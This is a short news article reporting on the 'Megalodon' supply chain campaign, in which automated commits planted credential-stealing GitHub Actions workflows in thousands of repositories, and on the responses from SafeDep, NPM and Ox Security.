In a significant cybersecurity breach, over 5,500 GitHub repositories were compromised in a sophisticated supply chain attack known as ‘Megalodon’. This operation, identified by security researchers, uses automated commits to infiltrate and inject malware into repositories.
Understanding the Megalodon Campaign
The Megalodon attack leverages GitHub Actions workflows to deploy a malicious payload. This payload is designed to exfiltrate sensitive information such as credentials, keys, and tokens. SafeDep, a cybersecurity firm, reported that more than 5,700 malicious commits were made to affected repositories within a mere six-hour period on May 18.
The attack involved two distinct payloads. One inserted a new workflow to be activated with every push and pull request, while the other altered existing workflows, creating potential backdoors. The malware on compromised machines could gather a wide array of sensitive data, including AWS credentials and GitHub tokens.
Discovery and Impact
The Megalodon campaign was uncovered following the detection of compromised versions of the Tiledesk package, an open-source chatbot platform. These versions were published between May 19 and May 21 without the maintainer’s knowledge, as the GitHub repository had been previously compromised.
SafeDep’s investigation revealed that all 5,718 malicious commits were executed on May 18, between 11:36 and 17:48 UTC. The attack targeted 5,561 distinct repositories, utilizing the ‘workflow_dispatch’ feature in GitHub Actions to ensure backdoors could be activated later.
Response and Future Implications
In response, NPM has invalidated all granular access tokens with write permissions that bypass two-factor authentication. However, Ox Security highlights that this step, while helpful, does not address the root problem of unchecked code uploads.
The incident underscores the beginning of a new era in supply chain attacks, with experts warning of more frequent and severe cyber threats looming ahead. As developers and organizations brace for these challenges, enhanced vetting and security measures become increasingly crucial.
As the landscape of cybersecurity threats evolves, this attack serves as a stark reminder of the vulnerabilities present in software supply chains. The industry must adapt to mitigate risks and protect against future attacks.
